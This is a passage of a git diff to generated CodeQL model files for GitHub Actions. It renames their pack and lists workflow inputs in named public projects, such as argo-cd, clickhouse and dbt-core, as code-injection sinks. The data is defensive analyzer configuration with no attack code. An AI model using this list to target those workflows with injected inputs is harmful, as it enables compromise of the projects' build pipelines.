@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 4feef931f71e..2cfa8a46c83e 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index 189cd8bbafdc..8c3c5a585028 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index 418694a596d1..aa75ce39295d 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index 10c4f8a3e3c3..e9dd33c6f175 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 1837a505499e..a0bd22ad352e 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index 094e4602e8e2..fb98c6a7d9b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index ec264f96bf16..0c108422a94e 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 7463396b1522..c820724bd71e 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 4c52a10d4f1d..51d32bde4ba7 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index a6c5a8b8e3bc..b747a4a27df1 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 286e75fc9e20..c5c26bc7926f 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 9ea5a9a34c70..62a1a853937d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 34e41e9c589d..b6c0c1b5e644 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index cc38156973bd..005db8e9ddce 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 748287e75f82..a1090c45ae08 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 703a138d28d7..051aacfeee04 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 97f1bafd1f38..1fb380a3a725 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 064c946363f7..a8b8234e1fc5 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 4a5c66bc7440..108bbad1c072 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index a1e4b624b454..42ed67f3d208 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 888aed947da2..a664d6063e30 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 3b5f69e93423..6270ab5842ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 8e28b46f2c70..0c4d975e0129 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 7f63b48ed848..64fc3792659c 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index e7e42031e047..f48be6693d06 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 0c34609ccefc..f2ebae0b0eac 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 82de946e406e..ec591db22ac9 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 09c4c2a83c31..06fdea3f8a26 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index 0e4571fc728b..b864551b3fbe 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index 6a03acfb11dc..fdb499a81dcb 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index f41ee1211d3d..c831a5d6d8f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 8a64c0ce5f11..d9d4e9bd2fa9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index 18e66bf72913..4091c74dee5a 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 1ed7561a5334..1c6d8804d6d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index 738fde2cb865..f94c87537cf4 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index c61a63f11443..efb8e467a0a0 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index fef036f4f297..8a7b36e365c5 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index b13ba8bc40f0..0d6fb59ed509 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 3fb2fefff6b9..74bdb5ab2801 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 4344e254be05..038fd953d6e8 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 2a7c5feafead..0c185f4cbd56 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 9ccb41c3a8c9..44e89b4e2518 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index b71e6c001d00..6b4feeedf62f 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index ff0695c0ef25..43e993417170 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 9576ce3892a9..cc5fb5c8d57a 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index b78d61184114..64ca7805d901 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index cbe56806056b..eab60f252385 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 391bbc6aacb9..fc91813e01b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml 
